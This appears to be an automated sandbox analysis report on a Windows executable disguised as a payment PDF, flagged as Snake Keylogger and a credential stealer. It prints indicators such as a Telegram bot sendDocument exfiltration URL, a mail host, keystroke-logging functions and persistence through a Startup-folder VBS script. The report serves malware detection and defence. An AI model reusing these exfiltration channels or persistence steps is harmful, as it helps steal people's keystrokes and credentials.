Source: PI 00928292828.exe, 00000001.00000002.2945608145.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.000000000283E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgd
Source: PI 00928292828.exe, 00000001.00000002.2945608145.0000000002C48000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.00000000028E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.mzgold.ir
Source: PI 00928292828.exe, 00000001.00000002.2945608145.0000000002C48000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.00000000028E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.mzgold.ird
Source: PI 00928292828.exe, 00000001.00000002.2942324299.0000000000C87000.00000004.00000020.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2950272190.0000000006094000.00000004.00000020.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2950272190.00000000060B4000.00000004.00000020.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2945608145.0000000002C48000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2950213670.0000000005E6C000.00000004.00000020.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2950213670.0000000005E30000.00000004.00000020.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2943277640.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.i.lencr.org/0
Source: PI 00928292828.exe, 00000001.00000002.2942324299.0000000000C87000.00000004.00000020.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2950272190.0000000006094000.00000004.00000020.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2950272190.00000000060B4000.00000004.00000020.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2945608145.0000000002C48000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2950213670.0000000005E6C000.00000004.00000020.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2950213670.0000000005E30000.00000004.00000020.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2943277640.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.o.lencr.org0#
Source: PI 00928292828.exe, 00000001.00000002.2945608145.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.000000000285B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: PI 00928292828.exe, 00000001.00000002.2945608145.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.000000000285B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.orgd
Source: PI 00928292828.exe, 00000000.00000002.1691908965.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2945608145.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1837219390.00000000031F5000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.00000000027C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PI 00928292828.exe, 00000001.00000002.2950272190.00000000060B9000.00000004.00000020.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2942324299.0000000000C87000.00000004.00000020.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2950272190.00000000060B4000.00000004.00000020.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2945608145.0000000002C48000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2950672050.0000000005E73000.00000004.00000020.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2950213670.0000000005E30000.00000004.00000020.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2943277640.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: PI 00928292828.exe, 00000001.00000002.2950272190.00000000060B9000.00000004.00000020.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2942324299.0000000000C87000.00000004.00000020.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2950272190.00000000060B4000.00000004.00000020.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2945608145.0000000002C48000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2950672050.0000000005E73000.00000004.00000020.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2950213670.0000000005E30000.00000004.00000020.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2943277640.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: PI 00928292828.exe, 00000001.00000002.2945608145.0000000002C48000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.00000000028E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: PI 00928292828.exe, 00000000.00000002.1701269663.00000000044B3000.00000004.00000800.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2941514043.0000000000413000.00000040.00000400.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.00000000045C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: PI 00928292828.exe, 00000000.00000002.1704203575.0000000005F40000.00000004.08000000.00040000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.00000000043A7000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.0000000004455000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: PI 00928292828.exe, 00000000.00000002.1704203575.0000000005F40000.00000004.08000000.00040000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.00000000043A7000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.0000000004455000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: PI 00928292828.exe, 00000000.00000002.1704203575.0000000005F40000.00000004.08000000.00040000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.00000000043A7000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.0000000004455000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: PI 00928292828.exe, 00000001.00000002.2945608145.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.000000000283E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: PI 00928292828.exe, 00000000.00000002.1701269663.00000000044B3000.00000004.00000800.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2945608145.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2941514043.0000000000413000.00000040.00000400.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.00000000045C3000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.000000000283E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: PI 00928292828.exe, 00000001.00000002.2945608145.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.000000000283E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
Source: PI 00928292828.exe, 00000001.00000002.2945608145.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.000000000283E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
Source: PI 00928292828.exe, 00000000.00000002.1704203575.0000000005F40000.00000004.08000000.00040000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.00000000043A7000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.0000000004455000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: PI 00928292828.exe, 00000000.00000002.1704203575.0000000005F40000.00000004.08000000.00040000.00000000.sdmp, PI 00928292828.exe, 00000000.00000002.1691908965.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1837219390.00000000031F5000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.00000000043A7000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.0000000004455000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: PI 00928292828.exe, 00000000.00000002.1704203575.0000000005F40000.00000004.08000000.00040000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.00000000043A7000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.0000000004455000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.PI 00928292828.exe.44b4218.1.raw.unpack, UltraSpeed.cs

.Net Code: VKCodeToUnicode

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.PI 00928292828.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.PI 00928292828.exe.44b4218.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.PI 00928292828.exe.44b4218.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.PI 00928292828.exe.44b4218.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.PI 00928292828.exe.44b4218.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000000.00000002.1701269663.00000000044B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1701269663.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.1859555653.00000000045C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: PI 00928292828.exe PID: 7340, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: skype.exe PID: 7600, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 0_2_03161840	0_2_03161840
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 0_2_03161CB8	0_2_03161CB8
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 0_2_0316B5F0	0_2_0316B5F0
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 0_2_0316B5E1	0_2_0316B5E1
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 0_2_03161A41	0_2_03161A41
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 0_2_0316BF73	0_2_0316BF73
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 0_2_0316BF80	0_2_0316BF80
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 0_2_03161CA7	0_2_03161CA7
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 0_2_066EF708	0_2_066EF708
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 0_2_066EF9C8	0_2_066EF9C8
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 0_2_066EE610	0_2_066EE610
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 0_2_066EE078	0_2_066EE078
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 0_2_066D0040	0_2_066D0040
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 0_2_066D0021	0_2_066D0021
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 1_2_00EFC548	1_2_00EFC548
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 1_2_00EF2DD1	1_2_00EF2DD1
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 1_2_00EF9490	1_2_00EF9490
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 1_2_00EFC539	1_2_00EFC539
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 1_2_00EF947F	1_2_00EF947F
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 1_2_06965E0C	1_2_06965E0C
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 1_2_0696B709	1_2_0696B709
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 1_2_06966C71	1_2_06966C71
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 1_2_06963200	1_2_06963200
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 1_2_06964A60	1_2_06964A60
Source: C:\Users\user\AppData\Roaming\skype.exe	Code function: 3_2_01681840	3_2_01681840
Source: C:\Users\user\AppData\Roaming\skype.exe	Code function: 3_2_01681CB8	3_2_01681CB8
Source: C:\Users\user\AppData\Roaming\skype.exe	Code function: 3_2_0168B5E1	3_2_0168B5E1
Source: C:\Users\user\AppData\Roaming\skype.exe	Code function: 3_2_0168B5F0	3_2_0168B5F0
Source: C:\Users\user\AppData\Roaming\skype.exe	Code function: 3_2_01681A41	3_2_01681A41
Source: C:\Users\user\AppData\Roaming\skype.exe	Code function: 3_2_01681CA7	3_2_01681CA7
Source: C:\Users\user\AppData\Roaming\skype.exe	Code function: 3_2_0168BF80	3_2_0168BF80
Source: C:\Users\user\AppData\Roaming\skype.exe	Code function: 3_2_0645F708	3_2_0645F708
Source: C:\Users\user\AppData\Roaming\skype.exe	Code function: 3_2_0645F9C8	3_2_0645F9C8
Source: C:\Users\user\AppData\Roaming\skype.exe	Code function: 3_2_0645E610	3_2_0645E610
Source: C:\Users\user\AppData\Roaming\skype.exe	Code function: 3_2_06440040	3_2_06440040
Source: C:\Users\user\AppData\Roaming\skype.exe	Code function: 3_2_0645E078	3_2_0645E078
Source: C:\Users\user\AppData\Roaming\skype.exe	Code function: 3_2_06440014	3_2_06440014
Source: C:\Users\user\AppData\Roaming\skype.exe	Code function: 4_2_00A4C530	4_2_00A4C530
Source: C:\Users\user\AppData\Roaming\skype.exe	Code function: 4_2_00A49480	4_2_00A49480
Source: C:\Users\user\AppData\Roaming\skype.exe	Code function: 4_2_00A4C521	4_2_00A4C521
Source: C:\Users\user\AppData\Roaming\skype.exe	Code function: 4_2_00A4946F	4_2_00A4946F
Source: C:\Users\user\AppData\Roaming\skype.exe	Code function: 4_2_05FC2630	4_2_05FC2630
Source: C:\Users\user\AppData\Roaming\skype.exe	Code function: 4_2_05FC4D78	4_2_05FC4D78
Source: C:\Users\user\AppData\Roaming\skype.exe	Code function: 4_2_05FCBB91	4_2_05FCBB91

Source: PI 00928292828.exe, 00000000.00000002.1704203575.0000000005F40000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs PI 00928292828.exe
Source: PI 00928292828.exe, 00000000.00000002.1704302032.0000000005F90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PI 00928292828.exe
Source: PI 00928292828.exe, 00000000.00000002.1691908965.00000000035CF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs PI 00928292828.exe
Source: PI 00928292828.exe, 00000000.00000002.1701269663.00000000044B3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs PI 00928292828.exe
Source: PI 00928292828.exe, 00000000.00000002.1701269663.00000000044B3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFbbvugct.dll" vs PI 00928292828.exe
Source: PI 00928292828.exe, 00000000.00000002.1690304957.000000000144E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PI 00928292828.exe
Source: PI 00928292828.exe, 00000000.00000002.1702191993.00000000059F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameFbbvugct.dll" vs PI 00928292828.exe
Source: PI 00928292828.exe, 00000000.00000000.1679804242.000000000103E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamepayment pdf.exe8 vs PI 00928292828.exe
Source: PI 00928292828.exe, 00000000.00000002.1691908965.00000000032D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs PI 00928292828.exe
Source: PI 00928292828.exe, 00000001.00000002.2941514043.000000000041A000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs PI 00928292828.exe
Source: PI 00928292828.exe, 00000001.00000002.2942160879.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PI 00928292828.exe
Source: PI 00928292828.exe	Binary or memory string: OriginalFilenamepayment pdf.exe8 vs PI 00928292828.exe

Source: PI 00928292828.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 1.2.PI 00928292828.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.PI 00928292828.exe.44b4218.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.PI 00928292828.exe.44b4218.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.PI 00928292828.exe.44b4218.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.PI 00928292828.exe.44b4218.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.1701269663.00000000044B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1701269663.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000002.1859555653.00000000045C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: PI 00928292828.exe PID: 7340, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: skype.exe PID: 7600, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: PI 00928292828.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: skype.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PI 00928292828.exe, PredicateExecutor.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: skype.exe.0.dr, PredicateExecutor.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PI 00928292828.exe.44b4218.1.raw.unpack, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PI 00928292828.exe.44b4218.1.raw.unpack, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.PI 00928292828.exe.5f90000.6.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.PI 00928292828.exe.5f90000.6.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.PI 00928292828.exe.5f90000.6.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.PI 00928292828.exe.5f90000.6.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 0.2.PI 00928292828.exe.5f90000.6.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.PI 00928292828.exe.5f90000.6.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.PI 00928292828.exe.5f90000.6.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.PI 00928292828.exe.5f90000.6.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.PI 00928292828.exe.5f90000.6.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.PI 00928292828.exe.5f90000.6.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@8/3@3/3

Source: C:\Users\user\Desktop\PI 00928292828.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\skype.vbs

Jump to behavior

Source: C:\Users\user\AppData\Roaming\skype.exe

Mutant created: NULL

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\skype.vbs"

Source: PI 00928292828.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PI 00928292828.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PI 00928292828.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PI 00928292828.exe, 00000001.00000002.2945608145.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2945608145.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2945608145.0000000002C13000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.000000000289E000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.00000000028AE000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PI 00928292828.exe	Virustotal: Detection: 45%
Source: PI 00928292828.exe	ReversingLabs: Detection: 42%

Source: C:\Users\user\Desktop\PI 00928292828.exe

File read: C:\Users\user\Desktop\PI 00928292828.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PI 00928292828.exe "C:\Users\user\Desktop\PI 00928292828.exe"
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process created: C:\Users\user\Desktop\PI 00928292828.exe "C:\Users\user\Desktop\PI 00928292828.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\skype.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\skype.exe "C:\Users\user\AppData\Roaming\skype.exe"
Source: C:\Users\user\AppData\Roaming\skype.exe	Process created: C:\Users\user\AppData\Roaming\skype.exe "C:\Users\user\AppData\Roaming\skype.exe"
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process created: C:\Users\user\Desktop\PI 00928292828.exe "C:\Users\user\Desktop\PI 00928292828.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\skype.exe "C:\Users\user\AppData\Roaming\skype.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process created: C:\Users\user\AppData\Roaming\skype.exe "C:\Users\user\AppData\Roaming\skype.exe"	Jump to behavior

